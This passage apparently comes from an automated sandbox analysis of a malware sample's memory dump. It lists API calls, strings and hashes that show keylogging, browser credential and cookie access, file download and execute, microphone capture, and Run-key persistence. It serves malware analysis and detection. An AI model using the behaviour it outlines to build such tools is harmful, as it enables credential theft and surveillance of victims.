                                                                                                  • Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1036877536-0
                                                                                                  • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                  • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                  APIs
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3360349984-0
                                                                                                  • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                  • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                  • Opcode ID: e0c8e38477863af5088d6fe634e6a0ac193c61f6508a68f7b7f24266df6e7c31
                                                                                                  • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                                                                  • Opcode Fuzzy Hash: e0c8e38477863af5088d6fe634e6a0ac193c61f6508a68f7b7f24266df6e7c31
                                                                                                  • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                                  • String ID: HSG$exepath$RG
                                                                                                  • API String ID: 4119054056-4111122955
                                                                                                  • Opcode ID: fa4264ab7ee0f56fbb1436d7a8ba00959a1c70ff335175d8111d710f019c8f65
                                                                                                  • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                                                                  • Opcode Fuzzy Hash: fa4264ab7ee0f56fbb1436d7a8ba00959a1c70ff335175d8111d710f019c8f65
                                                                                                  • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                  • String ID: [ $ ]
                                                                                                  • API String ID: 3309952895-93608704
                                                                                                  • Opcode ID: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                  • Opcode Fuzzy Hash: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3919263394-0
                                                                                                  • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                  • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041942B
• GetSystemMetrics.USER32(0000004D), ref: 00419431
• GetSystemMetrics.USER32(0000004E), ref: 00419437
• GetSystemMetrics.USER32(0000004F), ref: 0041943D
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00442D3D
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: CountEventTick
• String ID: !D@
• API String ID: 180926312-604454484
APIs
• GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: _wcslen$CloseCreateValue
• String ID: !D@$okmode
• API String ID: 3411444782-1942679189
APIs
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: ExistsFilePath
• String ID: alarm.wav$xYG
• API String ID: 1174141254-3120134784
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
                                                                                                  • Opcode ID: 752f1b0530f09a227fccadca3f0ff38838367ade688bdeb0a317c415c2ec40dd
                                                                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                  • Opcode Fuzzy Hash: 752f1b0530f09a227fccadca3f0ff38838367ade688bdeb0a317c415c2ec40dd
                                                                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: hMG
• API String ID: 2315374483-350922481
• Opcode ID: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
• Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
• Opcode Fuzzy Hash: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
• Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98

APIs
• IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$kKD
• API String ID: 1901932003-3269126172
• Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
• Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
• Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
• Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED

APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
• Opcode ID: 06bc77d55e8fb5840851428069709c111eb9faa75ae45f14f57a1bd53324c730
• Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
• Opcode Fuzzy Hash: 06bc77d55e8fb5840851428069709c111eb9faa75ae45f14f57a1bd53324c730
• Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD

APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
• Opcode ID: bace6f47b7681df2663094d7cdbcc2af99c158e76f34949f98d6431700df5ab4
• Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
• Opcode Fuzzy Hash: bace6f47b7681df2663094d7cdbcc2af99c158e76f34949f98d6431700df5ab4
• Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED

APIs
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
• Opcode ID: 0ad9673d5740a961e85d2e0bcc20bff1dc46e4ed95a55a23a34886f7ed05f085
• Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
• Opcode Fuzzy Hash: 0ad9673d5740a961e85d2e0bcc20bff1dc46e4ed95a55a23a34886f7ed05f085
• Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED

APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
• Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
• Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
• Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
• Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ExecuteShell
• String ID: !D@$open
• API String ID: 587946157-1586967515
• Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
• Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
• Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
• Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A

APIs
• GetKeyState.USER32(00000012), ref: 0040B6E0
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
• Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
• Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
• Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF

APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 00410F64
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Init_thread_footer__onexit
• String ID: <kG$@kG
• API String ID: 1881088180-1261746286
• Opcode ID: d4565030f79739e4e66115585db0aa101e00d72097786d2d832482c72ad8666d
• Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
• Opcode Fuzzy Hash: d4565030f79739e4e66115585db0aa101e00d72097786d2d832482c72ad8666d
• Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D

APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
• RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
• Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
• Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
• Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
• Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664

